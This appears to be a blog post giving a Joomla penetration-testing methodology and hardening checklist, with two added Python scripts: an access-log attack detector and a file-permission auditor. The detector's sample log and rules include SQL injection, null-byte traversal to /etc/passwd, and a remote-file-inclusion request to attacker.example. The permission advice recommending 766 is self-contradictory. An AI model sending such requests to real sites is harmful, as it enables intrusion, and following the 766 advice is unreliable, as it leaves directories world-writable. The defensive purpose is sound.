Joomla is one of the most popular CMSs, offering easy installation, handling and management of a web application. It is therefore used by many popular sites, which makes the security of Joomla important for keeping those web applications secure. Being an open source project, Joomla easily passes the basic vulnerability checks, but there are certainly some security risks which a pen-tester must not forget while testing such an application. These risks can be classified as:
- Vulnerabilities in third party components.
- Insecure custom development of certain features such as order booking, payment integration etc.
- Misconfiguration related vulnerabilities, and
- Vulnerabilities in the Joomla core (this might need in-depth testing of the core, however)
In my whitepaper, “Fast And Furious Joomla Security Testing Guide”, I have described a comprehensive approach to pen-test Joomla applications. I believe it should be of great value to both pen-testers and developers.
Current Security State of Joomla:
When we talk about security in Joomla, we have to focus on both the Joomla framework and the extensions. Joomla itself is quite stable and less prone to attacks. As of now, fewer vulnerabilities are being discovered in the Joomla core, although in the early days of the project a lot of vulnerabilities were discovered in the core, including XSS, SQL injection, privilege escalation, code injection, etc. This makes it very clear that the chances of hitting a vulnerability in a Joomla extension are much higher than those of finding a zero-day in the core.
Most Common vulnerabilities found in Joomla:
With code injection at the top, followed by SQL injection, a total of 55 injection flaws, 16 cross-site scripting, 14 file inclusion, 6 information disclosure, 3 privilege escalation, 2 CSRF, 1 HTTP response splitting and 2 access control bypass vulnerabilities have been reported in the Joomla core.
Need for this Document:
This documentation has been written to describe the methodology which should be adopted (not strictly) to test a web application powered by Joomla. This guide will also help you recommend security countermeasures to your clients for bulletproofing their Joomla sites.
Detecting Joomla: To detect a Joomla site, one can start with a manual approach by requesting a known Joomla path or digging into the source code of the site. Automated tools like Joomscan, CMS-explorer, etc. may also be used for this purpose. Also try to find the version of the installation: if an older version is deployed, you can Google the previously known bugs which have been assigned CVEs. Automated tools try to do the same by finding the version and listing the known bugs for that particular version. However, the admin might have made some changes in order to evade scanners, so the manual approach should always be tried as well.
1. Find the version (as mentioned above). If the installation is not the latest one, there are chances of already disclosed bugs. Google such information and try to reproduce the previously known bugs discovered by other researchers.
2. List the plugins being used. Find as many input points as possible and try injecting malicious data. Since exploiting the Joomla core requires a more intense manual test and your client is short of time, a time-saving approach is to dig into the source code, find the third-party extensions and try to locate the already known vulnerabilities in those extensions.
3. Core as a target: As already mentioned, the Joomla core is quite secure, and finding a bug in the core needs more planned and intense testing. For this, spider the application, find all the injection points, and try malicious input at each of them. There may be client-side validation at many points, which can be bypassed by using an intercepting proxy like Burp Suite, Tamper Data, etc. Meanwhile, you can use the same approach for testing plugins.
Automated Tools: Tools like CMS-explorer and Joomscan come with predefined test cases which they generate according to the application. They identify vulnerabilities mainly on the basis of the detected version of the core and plugins. However, one advantage they offer over manual testing is that they test for insecure configurations on the server very quickly.
SQL Injection: A lot of SQL injection flaws have been reported in the Joomla core as well as in extensions, so loading your kit with sqlmap is not a bad idea. Make sure you try SQL injection as soon as you see an id, catid or other such parameter passing by.
Testing for LFI: There have also been quite a number of LFI exploits in Joomla extensions and the core, so wherever you see a page or a path being passed through a parameter, do not forget to inject null bytes for directory traversal to internal files that may reveal critical information.
Testing for other vulnerabilities: Do not forget to test for command injection, LFI, RFI, CSRF, privilege escalation, information disclosure and other such flaws, as web application security is a huge field and a huge number of vulnerabilities are being exploited in the wild. Make sure you are aware of those tests while trying to find a vulnerable extension, to save your time. Another point to keep in mind is that while browsing the application, you might not be able to reach every possible file that may be vulnerable. This can be addressed either by spidering the web application or by getting a copy of the plugin explicitly in order to find all possible paths. If time allows, you can also do some source code review, given that you know a web programming language.
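The injection tests described above (SQL injection on id/catid parameters, null-byte directory traversal in path parameters, remote file inclusion) leave recognizable traces in the web server's access log. The following is an added example, not part of the original guide, that runs simple detection rules over constructed combined-format log lines; the signature patterns and the sample parameter names are assumptions chosen for illustration:

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined access-log format (Apache/Nginx default); adjust the regex for custom formats.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')

# Heuristic signatures for the flaw classes the guide tests for (assumed patterns,
# not an exhaustive ruleset); each is applied to the decoded value of every parameter.
RULES = {
    "sqli": re.compile(r"\bunion\b.*\bselect\b|'\s*(or|and)\s+\S+=|--\s*$|\bsleep\(", re.I),
    "lfi":  re.compile(r"(\.\./){2,}|\x00|/etc/passwd|/proc/self/environ", re.I),
    "rfi":  re.compile(r"^(https?|ftp)://", re.I),
}

def analyze_line(line):
    """Return hits {ip, ts, rule, param, value} for one access-log line ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    for param, value in parse_qsl(urlsplit(m["url"]).query, keep_blank_values=True):
        value = unquote(value)  # a second decode catches double-encoded payloads
        for rule, rx in RULES.items():
            if rx.search(value):
                hits.append({"ip": m["ip"], "ts": m["ts"], "rule": rule,
                             "param": param, "value": value})
                break  # one finding per parameter is enough
    return hits

def scan_log(text):
    """Run analyze_line over every line of an access log and collect the hits."""
    return [h for line in text.splitlines() for h in analyze_line(line)]

# Constructed sample lines using RFC 5737 documentation addresses, not a real site's log.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2012:13:55:36 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2012:13:56:01 +0000] "GET /index.php?option=com_content&view=article&id=12'%20or%201=1--%20 HTTP/1.1" 200 5120
198.51.100.7 - - [10/Oct/2012:13:57:12 +0000] "GET /index.php?option=com_foo&file=../../../../etc/passwd%00 HTTP/1.1" 500 312
198.51.100.7 - - [10/Oct/2012:13:58:40 +0000] "GET /index.php?option=com_foo&page=http://attacker.example/x.txt HTTP/1.1" 200 88
"""

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]:<13} {h["rule"]:<4} {h["param"]}={h["value"]!r}')
```

Feed it a real log with `scan_log(open("/var/log/apache2/access.log").read())`; the rules are deliberately simple and will need tuning for the parameters your extensions actually accept.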
Securing Joomla: Always keep your application updated, whether it is Joomla or your copy of Windows. There are zero-days of which you are not aware, but the vendors are, and hence they release updates. Keep track of your site's visitors, use strong passwords and self-test your application from time to time. You must also follow the security practices which the Joomla people mention in their Joomla Security Checklist. You can have a look at the following points as well:
- Always keep your Joomla up to date. Install the latest upgrade as soon as it is released.
- Whatever extensions are being used, they must be properly patched with the latest upgrade releases. Any old extension may give an attacker a way to compromise the site.
- Do not use extensions which have not been used by, or which have not been tested properly.
- All user inputs must be properly validated. These inputs can be form fields, URIs, image uploads, etc. For example, if a BROWSE button lets the user upload an image, it must only allow an image to be uploaded and not a PHP shell which may later work as a backdoor on the server.
- Use strong passwords for all logins: at least 8 characters, with at least one special character, one number, and mixed-case letters. This will protect your installation from brute force attacks.
- Always keep track of the “Latest Visitors” in the web server's log files to catch potential attacks. Never consider your log files as just a piece of information; they are highly useful for tracking and monitoring users.
- Put some effort into securing the whole server on which your Joomla-based site is hosted, whether it is a shared server or a dedicated one.
- Make a list of all the extensions you use and keep monitoring them.
- Keep yourself up to date with the latest vulnerabilities and disclosures at the various security advisories. Exploit-db, OSVDB, CVE, etc. are some good resources.
- Change the permissions on your .htaccess file, as by default it is writable (since Joomla has to update it). The best practice is to use 444 (r--r--r--).
- Proper file permissions must be set on the public directories so that no malicious file can be uploaded or executed. The best practice in this context is 766 (rwxrw-rw-), i.e. only the owner can read, write and execute; others can only read and write.
- No one must have permission to write into PHP files on the server. They must all be set to 444 (r--r--r--), i.e. everyone can only read.
- Delegate the roles. It keeps your administrator account safe: in case someone breaks into your machine, they must only get access to the respective user, and not the administrator account.
- The database user must only have permission to run commands like INSERT, UPDATE, and DELETE on rows. It must not be allowed to DROP tables.
- Change the names of backend folders, e.g. you can change /administrator to /admin12345.
- Last but not least, keep up to date with the latest vulnerabilities.
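As an added example (not from the guide or the Joomla project), the following script audits a Joomla tree against several of the checklist items above: the .htaccess mode, write bits on PHP files, directories writable by group or others, PHP files under the upload directory, and an inventory of installed extensions. It assumes the default Joomla layout (components/, administrator/components/, modules/, administrator/modules/, plugins/<group>/<name>, and images/ for uploads) and builds a constructed sample tree to demonstrate the checks:

```python
import os
import stat
import tempfile
# Assumed default Joomla layout (not from the post); a PHP file under the upload folder is suspect.
EXTENSION_DIRS = ("components", "administrator/components",
                  "modules", "administrator/modules", "plugins")
UPLOAD_DIRS = ("images",)
def _mode(path):
    return stat.S_IMODE(os.lstat(path).st_mode)
def audit_joomla(root):
    f = {"writable_php": [], "writable_dirs": [], "php_in_uploads": [], "extensions": set()}
    ht = os.path.join(root, ".htaccess")
    f["htaccess"] = oct(_mode(ht)) if os.path.exists(ht) else None  # checklist: 444
    for dirpath, _, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        if _mode(dirpath) & (stat.S_IWGRP | stat.S_IWOTH):  # group or others can write
            f["writable_dirs"].append(rel)
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.normpath(os.path.join(rel, name))
            if _mode(os.path.join(dirpath, name)) & 0o222:  # checklist: PHP files 444
                f["writable_php"].append(path)
            if rel.split(os.sep)[0] in UPLOAD_DIRS:
                f["php_in_uploads"].append(path)
    for ext_dir in EXTENSION_DIRS:  # inventory of installed extensions (checklist item)
        base = os.path.join(root, ext_dir)
        for entry in (os.listdir(base) if os.path.isdir(base) else ()):
            sub = os.path.join(base, entry)
            if ext_dir == "plugins" and os.path.isdir(sub):  # plugins/<group>/<name>
                f["extensions"].update(f"plg_{entry}_{p}" for p in os.listdir(sub)
                                       if os.path.isdir(os.path.join(sub, p)))
            elif entry.startswith(("com_", "mod_")):
                f["extensions"].add(entry)
    f["extensions"] = sorted(f["extensions"])
    return f

def build_sample_install():
    """Constructed sample tree: one writable PHP file and one PHP file under images/."""
    root = tempfile.mkdtemp()
    for d in ("components/com_content", "administrator/components/com_content",
              "modules/mod_menu", "plugins/system/cache", "images/stories"):
        os.makedirs(os.path.join(root, d))
    for d, _, _ in os.walk(root):
        os.chmod(d, 0o766 if os.path.basename(d) == "images" else 0o755)
    for rel, mode in (("index.php", 0o644), (".htaccess", 0o444),
                      ("images/stories/shell.php", 0o444)):
        open(os.path.join(root, rel), "w").close()
        os.chmod(os.path.join(root, rel), mode)
    return root
```

`audit_joomla("/var/www/joomla")` returns the findings as a dict; `build_sample_install()` only exists to create the constructed tree used for the demonstration.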